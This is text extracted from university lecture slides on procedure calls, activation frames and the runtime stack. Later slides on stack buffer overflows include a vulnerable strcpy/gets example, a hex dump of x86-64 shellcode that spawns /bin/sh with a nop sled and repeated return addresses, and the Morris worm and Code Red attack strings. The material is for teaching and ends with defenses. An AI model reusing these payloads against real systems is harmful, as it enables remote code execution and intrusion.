CPSC 213 Introduction to Computer Systems
Winter Session 2020, Term 2
Unit 1e – Feb 26
Procedures and the Stack
Overview
‣ Reading
• Companion: 2.8
• Textbook: 3.7, 3.12
‣ Learning Goals
• explain when local variables are allocated and freed
• distinguish a procedure’s return address from its return argument
• describe why activation frames are allocated on the stack and not on the heap
• explain how to use the stack pointer to access local variables and arguments
• given an arbitrary C procedure, describe the format of its stack activation frame
• explain the role of each of the caller and callee prologues and epilogues
• explain the tradeoffs involved in deciding whether to pass arguments on the stack or in registers
• describe the necessary conditions for not saving the return address on the stack and the benefit of not doing so
• write assembly code for procedure call arguments passed on the stack or in registers, with and without a return value
• write assembly code for a procedure with and without local variables, with arguments pass on the stack or in registers, with and without a return value
• write assembly code to access a local scalar, local “static” array, local “dynamic” array, local “static” struct, and local “dynamic” struct; i.e., each of the local variables shown below
void foo() {
int a;
int b[10];
int* c;
struct S s0;
struct S *s1;
}
• describe how a buffer-overflow, stack-smash attack occurs
• describe why this attack would be more difficult if stacks grew in the opposite direction; i.e., with new frames below (at higher addresses) older ones
2
Question: Local Variables / Arguments
void foo(int a0, int a1) {
int l0 = 0;
int l1 = 1;
…
}
‣ Can l0 and l1 or a0 and a1 be allocated statically?
A. Yes, always
B. Yes, but only if foo doesn’t call itself directly
C. Yes, but only if foo doesn’t call any functions
D. No, none of these can be allocated statically at all
Consider these examples
void foo(int a0) { int l0 = a0; if(a0 > 0)
foo(a0 – 1); printf(“%d\n”, l0);
}
How many different l0’s are there? (same is true for all locals and args)
When are they “alive”?
void foo(int a0) {
int l0 = 0;
bar(a0); }
What if there is no apparent recursion? What if bar() calls foo()?
4
Consider these examples
‣ Even if we ban all recursion, statically allocating everything is inefficient!
‣ At any given time, only a small fraction of functions need space to run
void die() {
char buf[4096];
sprintf(buf, “fatal error: %s”, error);
exit();
}
void init() {
char path[4096];
sprintf(path, “/path/to/init/%s”, code);
…
}
5
Life of a Local Argument
void foo(int a0, int a1) {
int l0 = 0;
int l1 = 1;
if(a0 > 0)
foo(a0 – 1, a1);
}
‣ Lifetime
• allocated when procedure starts
• de-allocated (freed) when procedure returns (in most languages, including C and Java)
‣ Activation
• execution of a procedure
• starts when procedure is called and ends when it returns
• there can be many activations of a single procedure alive at once
‣ Activation Frame l0: 0 • memory that stores an activation’s state l1: 1
• including its locals and arguments
‣ We could allocate Activation Frames from the Heap!
• call malloc() to create frame on procedure call and call free() on procedure return?
‣ Scope
• accessible ONLY within declaring procedure
• each execution of a procedure has its own private copy
a0: ? a1: ?
6
The Heap isn’t Best for Activation Frames
‣ Order of frame allocation and deallocation is special
• frames are de-allocated in the reverse order in which they are allocated
‣ We can thus build a very simple allocator for frames • lets start by reserving a BIG chunk of memory for all the frames
• assuming you know the address of this chunk • how would you allocate and free frames?
Simple, cheap allocation. Just add or subtract from a pointer.
Activation Frames
Requires more complicated and thus more costly allocation and deallocation to avoid fragmentation.
Explicit Allocation in Heap
‣ What data structure is this like?
‣ What restriction do we place on lifetime of local variables and args? 7
The Runtime Stack
‣ Stack of activation frames r5
Stack Top Current Frame
Code
Static Data
Heap
Stack
• stored in memory
• grows UP from bottom
‣ Stack Pointer
• general purpose register
• we will use r5
Stack Pointer (SP)
• stores base address of current frame – i.e., address of first byte in that frame
‣ Top and Bottom
• current frame is the “top” of the stack
• first activation is the “bottom” or “base”
‣ Static and Dynamic
• size of frame is (usually) static
• offset to locals and arguments is (usually) static • value of stack pointer is dynamic
Stack Bottom First Frame
8
Grows Up
Dynamic Stack Allocation
‣ Most of the time, the frame size is static
void foo(int a0, int a1) {
int l0 = 0;
int l1 = 1;
bar();
}
‣ But, stack allocation is dynamic, so this is possible:
void foo(int n) { int a[n];
a[0] = 42;
}
‣ Unlike malloc, you cannot check whether this allocation fails, and the stack is much smaller than the heap
9
Activation Frame Details
‣ Local Variables and Arguments
‣ Return address (ra)
• previously we put this in r6
• but doesn’t work for A() calls B() calls C() etc.
• instead we will save r6 on the stack, when necessary; callee will decide
‣ Other saved registers
• either or both caller and callee can save register values to the stack • do this so that callee has registers it can use
‣ Stack frame layout • compiler decides
• based on order convenient for stack creation (more in a moment)
• static offset to any member of stack frame from its base (like a struct)
saved registers…
locals…
return address
arguments…
saved registers…
‣ Example
void foo(int a0, int a1) {
int l0 = 0;
int l1 = 1;
bar();
struct foo_frame {
int l0;
int l1;
void *ra;
int a0;
int a1;
0x00: l0 0x04: l1 0x08: ra 0x0c: a0 0x10: a1
}
frame is like a struct notastruct,butlikeone };
10
Accessing a Local Variable or Argument
void foo(int a0, int a1) {
int l0 = 0;
int l1 = 1;
bar();
}
struct foo_frame {
int l0;
l0 l1 ra a0 a1
int l1;
void *ra;
int a0;
int a1;
};
‣ Access like a struct
• base is in r5 by convention – part of our Application Binary Interface (ABI) • offset is known statically
‣ Example intl0=0;
intl1=1;
l0 = a0;
l1 = a1;
ld $0, r0
st r0,(r5) #l0=0 ld $1,r0
st r0,4(r5) #l1=1
?
11
Some Implications
‣ What are values of g and l (in foo when it is active)?
int g;
void foo() {
int l;
}
‣ What code does compiler generate for last statement?
void foo (int n) {
int a[n];
int b;
b = 0;
}
‣ What is wrong with this?
int *foo() {
int l;
return &l; }
‣ or this?
void foo() {
int *l = malloc(100);
}
void goo() {int l=3;}
void foo() {int l;}
goo();
foo();
12
Allocating and Freeing Frames
‣ Compiler
• generates code to allocate and free when procedures are called / return
‣ Procedure Prologue
• code that executes just before procedure starts – part in caller before call
– part in callee at beginning of call
• allocates activation frame and changes stack pointer – subtract frame size from the stack pointer r5
• possibly saves some register values
‣ Procedure Epilogue
• code generated by compiler to when procedure ends – part in callee before just return
– part in caller just after return
• possibly restores some saved register values
• deallocates activation frame and restore stack pointer – add frame size to stack pointer r5
13
Stack Management Division of Labour
‣ Caller Prologue
in foo() before call
• allocate stack space for arguments
• save actual argument values to stack
‣ Callee Prologue in b() at start
• allocate stack space for return address and locals • save return address to stack
‣ Callee Epilogue
in b() before return
• load return address from stack
• deallocate stack space of return address and locals
‣ Caller Epilogue
in foo() after call
void b (int a0, int a1) {
int l0 = a0;
int l1 = a1;
c();
• deallocate stack space of arguments
r[sp] += 8
r[sp] -= 8 m[0+r[sp]] <= 0 m[4+r[sp]] <= 1
}
void foo () {
b (0, 1);
}
b's Frame: foo's Frame:
0x00: l0
0x04: l1
0x08: ra
0x00c: a0 0x010404: a1
14
r[sp] -= 12
m[8 + r[sp]] <= r[6]
r[6] <= m[8 + r[sp]] r[sp] += 12
Stack Bottom
Example
foo: deca r5
st r6, 0x0(r5)
ld $-8, r0
add r0, r5
ld $0, r0
st r0, 0(r5)
ld $1, r0
st r0, 4(r5)
gpc $6, r6 j b
ld $8, r0
add r0, r5
ld 0x0(r5), r6
inca r5
j 0x0(r6)
b: ld $-12, r0
add r0, r5
st r6, 0x8(r5)
ld 12(r5), r0
st r0,0(r5) ld 16(r5), r0
st r0, 4(r5)
gpc $6, r6
jc
ld 8(r5), r6
ld $12, r0
add r0, r5
j 0(r6)
(S8-locals-args)
# allocate callee part of foo's frame
# save ra on stack
# r0 = -8 = -(size of caller part of b's frame) # allocate caller part of b's frame #r0=0=valueofa0
# save value of a0 to stack #r0=1=valueofa1
# store value of a1 to stack
# set return address #b(0,1)
#r0=8=sizeofcallerpartofb'sframe # deallocate caller part of b's frame
# load return address from stack
# deallocate callee part of foo's frame
# return
# r0 = -12 = -(size of callee part of b's frame)
# allocate callee part of b's frame
# store return address to stack
# r0 = a0 #l0=a0
# r0 = a1
# l1 = a1
# set return address #c()
# load return address from stack #r0=12=sizeofcalleepartofb'sframe # deallocate callee parts of b's frame
# return
void b (int a0, int a1) {
int l0 = a0;
int l1 = a1;
c();
}
void foo () {
b (0, 1);
}
1. Caller Prologue
2. Call
6. Caller Epilogue
0x00: l0
0x04: l1
0x08: ra
0x0c: a0
0x10: a1
3. Callee Prologue
4. Callee Body
5. Callee Epilogue
b's Frame:
Why not Allocate Entire Frame in Callee?
‣
‣ If we instead allocated the entire frame in the Callee
• we would duplicate the arguments on the stack
• adds overhead to copy the from caller part of stack to callee
allocated by b
We do this
0x00: l0
0x04: l1
0x08: ra
0x0c: a0
0x10: a1
0x00: ra
Why not this?
0x00: l0
0x04: l1
0x08: ra
0x0c: a0
0x10: a1
0x00: a0
0x04: a1
0x08: ra
Only the caller knows the value of the actual parameters
• it needs to save them somewhere to transfer them to the callee
• we do this on the stack and thus allocate part of the frame in caller
b's Frame: foo's Frame:
foo(): ld $-8, r0 add r0, r5 ld $0, r0
st r0, 0(r5)
ld $1, r0
st r0, 4(r5)
gpc $6, r6 j b
ld $8,r0 add r0, r5
b(): ld $-20, r0 add r0, r5
ld 0x14(r5), r0
st r0, 0xc(r5)
ld 0x18(r5), r0
st r0, 0x10(r5)
st r6, 0x8(r5)
# r0 = -8 = (size of arguments)
# allocate space for argument values #r0=0=valueofa0
# save value of a0 to stack #r0=1=valueofa1
# store value of a1 to stack
# set return address #b(0,1)
#r0=8=sizearguments # deallocate argument area
# r0 = -20 = -(size of b's frame)
# allocate callee part of b's frame
# r0 = value of a0 from caller
# a0 = value from caller
# r0 = value of a1 from caller
# a1 = value from caller
# store return address to stack
Same as before
16
Unnecessary and costly copying of arguments
allocated by foo
b's Frame:
Wasted memory
foo's Frame:
Creating the stack
‣ Every program starts with a hidden procedure • usually called “start” or “entrypoint”
‣ The start procedure may • allocate memory for stack
• initialize the stack pointer • call main()
‣ For example in Snippets 8 and 9
• the “main” procedure is “foo”
• we’ll statically allocate stack at address 0x1000 to keep simulation simple
start: ld $stackBtm, r5 # sp = address of last word of stack
inca r5
gpc $0x6,r6 j foo halt
# sp = address of word after stack #r6=pc+6
#foo()
.pos 0x1000
stackTop:
stackBtm:
.long 0x0
...
.long 0x0
Question 1e.1
‣ What is a possible value of r5 in three()? • Numbers are in decimal; answer in decimal.
• All possible values are between 1900 and 2100.
void three () {
int i;
int j;
int k;
// r5 = ?
}
void two () {
int i;
int j;
three (); }
void one () {
int i;
two (); }
void foo () {
// r5 = 2000
one (); }
18
Return Value, Arguments and Optimizations
‣ Return value
• in C and Java, procedures/methods can return only a single value • C compilers use a designated register (r0) for this return value
‣ Arguments
• number and size of arguments is statically determined
• value of actual arguments is dynamically determined
• the compiler generally chooses to put arguments on the stack - caller prologue pushes actual argument values onto stack
- callee reads/writes arguments from/to the stack
• sometimes compiler chooses to avoid the stack for arguments - caller places argument values in registers
- callee reads/writes arguments directly from/to these registers - WHY does compiler do this?
- WHEN is this a good idea?
‣ Other optimizations
• return address, r6, does not always need to be saved to the stack
- WHY does compiler do this? WHEN is this possible?
• local variables are sometimes not needed or used - WHY? and WHEN?
19
Another Look at Arguments
int add (int a, int b) {
return a+b;
}
int s;
void foo () {
s = add (1,2);
}
.pos 0x200
foo: deca r5
st r6, (r5)
ld $0xfffffff8, r0
add r0, r5
ld $1, r0
st r0, 0(r5)
ld $2, r0
st r0, 4(r5)
gpc $6, r6
j add
ld $8, r1
add r1, r5
ld $s, r1
st r0, (r1)
ld (r5), r6
inca r5
j (r6)
.pos 0x300
add: ld 0(r5), r0
ld 4(r5), r1
add r1, r0
j (r6)
result of add() is returned in r0
Why no callee Prologue / Epilogue?
Arguments in Registers
int add (int a, int b) {
return a+b;
}
int s;
void foo () {
s = add (1,2);
}
Args on Stack
.pos 0x200
foo: deca r5
st r6, (r5)
ld $-8, r0 addr0,r5 ld $1, r0 st r0, 0(r5) ld $2, r0 st r0, 4(r5)
gpc $6, r6
j add
ld $8, r1
add r1, r5
ld $s, r1
st r0, (r1)
Args in Registers
.pos 0x200
foo:
ld inca
j
ld 4(r5), r1
add r1, r0
j (r6)
(r6)
add: ld 0(r5), r0
.pos 0x300
add: add
j
.pos 0x300
(r5), r6 r5
ld inca
j
(r5), r6 r5
(r6)
r1, r0
(r6)
21
deca
st r6, (r5)
r5
ld $1, r0
ld $2,r1
gpc $6, r6
j add
ld $s, r1
st r0, (r1)
Args and Locals Summary
‣ stack is managed by code that the compiler generates • grows from bottom up
- push by subtracting
• caller prologue
- allocates space on stack for arguments (unless using registers to pass args)
• callee prologue
- allocates space on stack for local variables and saved registers (e.g., save r6)
• callee epilogue
- deallocates stack frame (except arguments) and restores stack pointer and saved registers
• caller epilogue
- deallocates space on stack used for arguments - get return value (if any) from r0
‣ accessing local variables and arguments • static offset from stack pointer (e.g., r5)
More Reverse Engineering
23
What does this program do?
proc: deca
st r6, (r5)
ld 8(r5), r1
beq r1, L0
dec r1
ld 4(r5), r2
deca r5
deca r5
st r2, (r5)
st r1, 4(r5)
gpc $6, r6
j proc
inca r5
inca r5
ld 4(r5), r2
ld 8(r5), r1
dec r1
ld (r2,r1,4), r1
add r1, r0
br L1
L0: ld $0, r0
L1: ld (r5), r6
inca r5
j (r6)
void proc (int* a, int n) {
if (n==0)
return 0;
else
returnproc(a,n-1)+a[n-1] }
r5
24
What does this program do?
void proc (int* a, int n) {
if (n==0)
return 0;
else
return proc (a, n - 1) + a [n - 1] }}
No names or types for arguments (or locals)
25
void proc (a0, a1) {
if (a1==0)
return 0;
else
return proc (a0, a1 - 1) + a0 [a1 - 1]
What does this program do?
void proc (a0, a1) {
if (a1==0)
void proc (a0, a1) {
if (a1==0) goto L0;
return proc (a0, a1 - 1) + a0 [a1 - 1]
goto L1
L0: return 0
L1:
}
}
return 0;
else
return proc (a0, a1 - 1) + a0 [a1 - 1]
No IF statement. Comparison to 0; use goto; swap then and else position.
26
What does this program do?
void proc (a0, a1) {
if (a1==0) goto L0;
return proc (a0, a1 - 1) + a0 [a1 - 1]
goto L1
L0: return 0
L1:
}
void proc (a0, a1) {
if (a1==0) goto L0;
proc (a0, a1 - 1)
r0 = r0 + a0 [a1 - 1];
goto L1
L0: r0 = 0
L1: return;
}
Procedure return value is in r0 (a global variable)
27
What does this program do?
void proc (a0, a1) {
if (a1==0) goto L0; proc (a0, a1 - 1)
r0 = r0 + a0 [a1 - 1]; giofto(aL11==0) goto L0;
L0: r0 = 0
L1: return;
}
proc (a0, a1 - 1)
r0 = r0 + a0 [a1 - 1];
goto L1 L0:r0=0
L1: return; }
proc: r5--
mem[r5] = r6
a0 = mem[1+r5]
a1 = mem[2+r5]
if a1==0 goto L0
r5--
r5--
mem[0+r5] = a0
mem[1+r5] = a1-1
r6 = RA
goto proc
RA: r5++ r5++
r0 += mem[a0 + a1]
goto L1 L0: r0=0
L1: r6= mem[r5] r5++
goto *r6
No procedure calls. Save return address and use goto for call and return. Arguments and saved value of return address are on stack stored in memory. Use global r5 (global variable) to point to top of stack.
28
What does this program do?
proc: r5--
mem[r5] = r6
proc:
r5--
mem[r5] = r6
r1 = mem[2+r5]
if a1==0 goto L0 r1--
r2= mem[1+r5] r5--
r5--
mem[0+r5] = r2 mem[1+r5] = r1 r6= RA
goto proc
r5++
r5++
r2= mem[1+r5] r1= mem[2+r5] r1--
r1= mem[r2 + r1] r0 += r1
goto L1
r0=0
r6= mem[r5]
r5++
goto *r6
gro6to= RA: gro5t+o+ RA: r5++
pRrAoc proc
L0: r0=
L1: r6= r5++
0
mem[r5]
a0 = mem[1+r5] ai1f =a1=m=e0m[2g+ort5o]L0 if a1==0 goto L0 ar51--= mem[2+r5] r5--
mre5-m-[0+r5] mem[01+r5] rme6m[=1+RrA5]
r50++=mem[a0+a1]
goto L1
gro0to+=*rm6em[a0 + a1]
goto L1
L0: r0=0
L1: r6= r5++
goto *r6
= a0 =a01-1 = a1-1
L0: mem[r6] L1:
Swap the order of a few things. Use global rx variables for all temps.
Don’t trust rx variable values to remain after return from call.
29
RA:
What does this program do?
proc: r5--
mem[r5] = r6
r1 = mem[2+r5] if a1==0 goto L0 r1--
r2= mem[1+r5] r5--
r5--
mem[0+r5] = r2 mem[1+r5] = r1 r6 = RA
goto proc
RA: r5++ r5++
r2= mem[1+r5] r1= mem[2+r5] r1--
r1= mem[r2 + r1] r0 += r1
gotoL1
L0: r0=0
L1: r6= r5++
goto *r6
proc:
deca r5
st r6, (r5)
ld 8(r5), r1 beq r1, L0
dec r1
ld 4(r5), r2 deca r5
deca r5
st r2, (r5)
st r1, 4(r5) gpc $6, r6
j proc
inca r5
inca r5
ld 4(r5), r2
ld 8(r5), r1 dec r1
ld (r2,r1,4), r1 add r1, r0
br L1
ld $0,r0
ld (r5), r6 inca r5
j (r6)
L0: mem[r5] L1:
Change from C syntax to 213 assembly syntax. Global variables are registers.
30
What does this program do?
deca r5 # allocate callee portion of stack frame
st r6, (r5) # store return address on stack
prologue
ld 8(r5), r1 # r1 = arg1
beq r1,L0 #gotoL0ifarg1==0
if
dec r1
ld 4(r5), r2
deca r5
deca r5
st r2, (r5)
st r1, 4(r5)
#r1=arg1-1
# r2 = arg0
# allocate caller portion stack frame # allocate caller portion stack frame # first arg of call is arg0
# second arg of call is arg1 - 1
procedure call
gpc $6, r6 # save return address in r6
j proc # proc (arg0, arg1 - 1)
inca r5 # deallocate caller portion of stack frame
inca r5 # deallocate caller portion of stack frame
ld 4(r5), r2
ld 8(r5), r1
br L1
# r2 = arg0
# r1 = arg1
read array set return value to result + array value
dec r1 #r1=arg1-1
ld (r2,r1,4), r1 # r1 = arg0 [arg1 -1]
add r1, r0 # return value = proc (arg0, arg1-1) + arg0[arg1-1]
# goto end of procedure
ld $0,r0 #returnvalue=0ifarg1==0
set return value to 0
proc:
L0:
L1: ld (r5), r6
inca r5 j (r6)
# restore return address from stack epilogue and return
# deallocate callee portion of stack frame
# return (arg1==0)? 0 : proc(arg0, arg1-1) + arg0[arg1-1]
31
Stack Buffer Overflow
32
Basic Buffer Overflow
‣ Can we “become an admin”?
./prog AAAABBBBCCCCDDDDX
struct user {
char username[16];
char is_admin;
} u;
int main(int argc, char **argv) {
u.is_admin = 0;
printf("Hello, %s\n", argv[1]);
strcpy(u.username, argv[1]);
if(u.is_admin) {
printf("Hello admin: %c!!\n", u.is_admin);
system("/bin/sh");
} else {
printf("Bye %s!\n", u.username);
}
}
username[0] A? username[1] ?A username[2] ?A username[3] A? username[4] B? username[5] ?B username[6] ?B username[7] B? username[8] ?C username[9] ?C username[10] C? username[11] ?C username[12] D? username[13] ?D username[14] ?D username[15] D? is_admin \X0
Stack Buffer Overflow
‣ Find the bug
Input name: AAAAAAAAAA...
char *gets(char *buf) {
for(int i=0; ; i++) {
char ch = getchar();
if(ch == '\n')
break;
buf[i] = ch;
}
return buf; }
int main() {
char name[4096];
printf("Welcome! Input name: ");
gets(name);
printf("Hello, %s!\n", name);
}
name[0] A name[1] A name[2] A name[3] A ...... name[4092] A name[4093] A name[4094] A name[4095] A saved regs ... ra PC
if it continues
overflow for loop starts here...
Code as Data, Data as Code
‣Program code is just bytes in memory
‣Program data is just bytes in memory
‣Implication: we can inject our own code
• Attacker injects data that can be interpreted as code
• Injected code can do anything
‣Usually want an interactive shell - inject shellcode
• shellcode calls the operating system to launch an interactive shell, like system("/bin/sh")
35
Changing the return address
‣ The return address is
• a value stored in memory on the stack
• the target address of the return statement
• the address of instruction that executes after the return
name[0] SHELL
name[1] CODE name[2] name[3]
...
name[4092]
name[4093]
name[4094]
name[4095]
saved regs
‣ Control flow
• the value of the return address determines control flow ra • changing the return address changes control flow
‣ The attacker’s goal
• introduce code into the program from outside • trick program into running it
‣ Changing the return address
• allows attacker to change control flow
• if it points to data, then that data becomes the program
36
The Stack-Smash Attack String
‣ Hard parts
• determining location of return address in attack string • determining address to change return address to
‣ Making it easier
• approximate return address value
- e.g., run program with big string and see where it crashes • pad code with a many dummy (nop) instructions
-
• insert many copies of the return address
- in case of different numbers of local variables, saved registers...
‣ Works if
• return address guess is anywhere in nop slide
- e.g, in the example address 0x1234 must be somewhere between first nop and start of virus
name[0]
name[1]
name[2]
name[3]
nop
nop
nop
nop
called the “nop sled”
name[4] nop
name[5] nop
... ...
name[4090] nop
name[4091] nop
name[4092] nop
name[4093] nop
name[4094] get
name[4095] shell
saved regs ...
37
ra
0x1234
0x1234
0x1234
0x1234
0x1234
Our Attack String
000000000000: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 000000000010: 9090 9090 9090 9090 9090 9090 9090 9090 ................ ...
000000000f90: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 000000000fa0: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 000000000fb0: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 000000000fc0: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 000000000fd0: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 000000000fe0: 9090 9048 8d3d f9ff ffff 4883 c715 31f6 ...H.=....H...1. 000000000ff0: 31d2 31c0 b03b 0f05 2f62 696e 2f73 6800 1.1..;../bin/sh. 000000001000: a0df ffff ff7f 0000 a0df ffff ff7f 0000 ................ 000000001010: a0df ffff ff7f 0000 a0df ffff ff7f 0000 ................
38
Our Attack String In Memory
7fffffffd000: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 7fffffffd010: 9090 9090 9090 9090 9090 9090 9090 9090 ................ ...
7fffffffdf90: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 7fffffffdfa0: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 7fffffffdfb0: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 7fffffffdfc0: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 7fffffffdfd0: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 7fffffffdfe0: 9090 9048 8d3d f9ff ffff 4883 c715 31f6 ...H.=....H...1. 7fffffffdff0: 31d2 31c0 b03b 0f05 2f62 696e 2f73 6800 1.1..;../bin/sh. 7fffffffe000: a0df ffff ff7f 0000 a0df ffff ff7f 0000 ................ 7fffffffe010: a0df ffff ff7f 0000 a0df ffff ff7f 0000 ................
00007fffffffdfa0
39
Let’s Demo
40
Morris Worm Payload
# VAX Assembly
pushl $68732f ’/sh\0’
pushl $6e69622f ’/bin’
movl sp, r10
pushl $0
pushl $0
pushl r10
pushl $3
movl sp,ap
chmk $3b
41
Morris Worm Attack String
00000000: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 00000010: 0101 0101 0101 0101 0101 0101 0101 0101 ................ ...
00000170: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 00000180: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 00000190: dd8f 2f73 6800 dd8f 2f62 696e d05e 5add ../sh.../bin.^Z. 000001a0: 00dd 00dd 5add 03d0 5e5c bc3b e4f9 e4e2 ....Z...^\.;.... 000001b0: a1ae e3e8 efae f2e9 0000 0000 0000 0000 ................ 000001c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 000001d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 000001e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 000001f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00000200: 0000 0000 20c0 0100 fce9 ff7f a8e8 ff7f .... ........... 00000210: bce8 ff7f 0000 0028 .......(
42
43
Code Red (2001)
‣ attacked buffer overflow in IIS (Microsoft’s Web Server) • infected 359,000 machines in first 14 hours (est cost. $2.6B)
• displayed string “HELLO! Welcome to http://www.worm.com! Hacked By Chinese!”
• was to launch DOS attack on whitehouse.gov, but detected and the White House changed their IP address to avoid attack
‣ attack string
• The N’s cause the overflow; what follows is the beginning of the virus
GET /default.ida?
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd
3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00
c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
44
System Calls
‣ CPU instructions to signal the OS to do something ‣ CPSC 313 for gory details
‣ New instruction in our ISA
‣ Like function calls, but args passed in registers r0-r2
‣ Available system calls:
• sys $0: read(fd, buffer, size): read some data from fd (0 = standard in)
• sys $1: write(fd, buffer, size): write some data to fd (1 = standard out) • sys $2: exec(buffer, size): execute program
‣ System calls return result in r0
• read: # of bytes read from input (-1 on error)
• write: # of bytes written (-1 on error) • exec: 0 if successful, -1 if not
Name
Semantics
Assembly
Machine
system call
system call #n
sys $n
f1nn
45
System Calls
‣ Example code:
.pos 0x1000
ld $0, r0
ld $str, r1
ld $12, r2
sys $1
halt
.pos 0x2000
str:
.long 0x68656c6c # hell
.long 0x6f20776f # o wo
.long 0x726c640a # rld\n
46
In the Lab
‣ You get to write a real exploit • first, write some malicious code
• then, get your code executed
‣ Attacker input must include code
• convert your assembly to machine code
• enter machine code as data in your input string
‣ And, you get to attack a real server on the Internet ‣ Address TBA
Protecting from Buffer Overflow Attack
‣ What if stack grew DOWN?
• active frame at the highest addresses • draw the picture...
buf[0]
buf[1]
buf[2]
buf[3]
buf[4]
buf[5]
buf[6]
buf[7]
buf[8]
buf[9]
bp
ra str
0x1234 0x1234 0x1234 0x1234 0x1234 0x1234 0x1234 0x1234 0x1234 0x1234 0x1234 0x1234 0x1234 0x1234 0x1234 0x1234 0x1234 nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop virus ...
while loop writes attack string to stack starting at &buf[0]
‣ Modern protections
• NX/DEP: Non-executable stack
• SSP: Canaries
• ASLR: Randomized stack addresses
48
Attack String
UBC CTF Team
‣ Meets every Tuesday at 5:00pm on Discord • https://ubcctf.github.io/ - invite there
‣ Email me for more info: Robert Xiao
49